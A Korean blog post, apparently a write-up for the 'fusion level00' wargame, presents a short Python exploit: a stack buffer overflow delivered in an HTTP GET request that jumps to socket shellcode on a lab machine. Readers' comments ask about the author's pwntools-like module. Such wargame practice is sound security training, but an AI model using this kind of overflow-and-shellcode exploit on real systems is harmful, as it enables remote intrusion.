BLOG main image
분류 전체보기 (222)
Reversing (13)
Pwnable (4)
Linux Kernel (3)
Crypto (2)
Wargames (66)
Programming (18)
Write Up (32)
Project (22)
Web (2)
My Life (52)
Memo (3)
etc (2)
발표자료 (1)
36,064 Visitors up to today!
Today 13 hit, Yesterday 30 hit
daisy rss
tistory 티스토리 가입하기!
2016.04.15 03:15


간단한 bof 였다. NX가 걸려있지 않고 버퍼의 주소를 알기 때문에 쉘코드를 사용했다. 다만 realpath라는 함수의 용도를 모르겠어서 약간 헤멨었다.

1
2
3
4
5
6
7
8
9
10
11
12
from SunKn0wn import *
 
= remote('192.168.179.151'20000)
r.recvuntil('at 0x')
buf = int(r.recv(8), 16)
print "[*]buffer addr : " + str(hex(buf))
payload = 'A' * 139
payload += p32(buf + 144)
payload += SocketShell32
payload = 'GET ' + payload + ' HTTP/1.1'
r.recvsend(payload)
r.interactive()
cs


'Wargames > fusion' 카테고리의 다른 글

fusion level04  (0) 2016.04.28
fusion level03  (0) 2016.04.25
fusion level02  (0) 2016.04.20
fusion level01  (0) 2016.04.15
fusion level00  (2) 2016.04.15
Gyeongje | 2017.01.18 18:42 신고 | PERMALINK | EDIT/DEL | REPLY
코드에 궁금한점이 생겨서 질문합니다
작성자님 블로그 이름이신 SunKn0wn의 이름으로 모듈을 불러오시는데 따로 pwntools 모듈의 이름바꿔서 사용하시는건가요? 아니면 어떤 의미가 있어서 사용하시는건지 궁금합니다.
5unKn0wn | 2017.01.23 03:41 신고 | PERMALINK | EDIT/DEL
아 SunKn0wn 모듈은 직접 만든거구요. 이름은 딱히 쓸만한게 없어서 pwntools랑 똑같이 했습니다. 윈도우에서는 짤 때는 SunKn0wn으로 짜고 리눅스로 옮겨서 디버깅 하거나 할 때는 모듈 이름만 pwntools로 바꿔서 하면 편해서 그렇게 했습니다
Name
Password
Homepage
Secret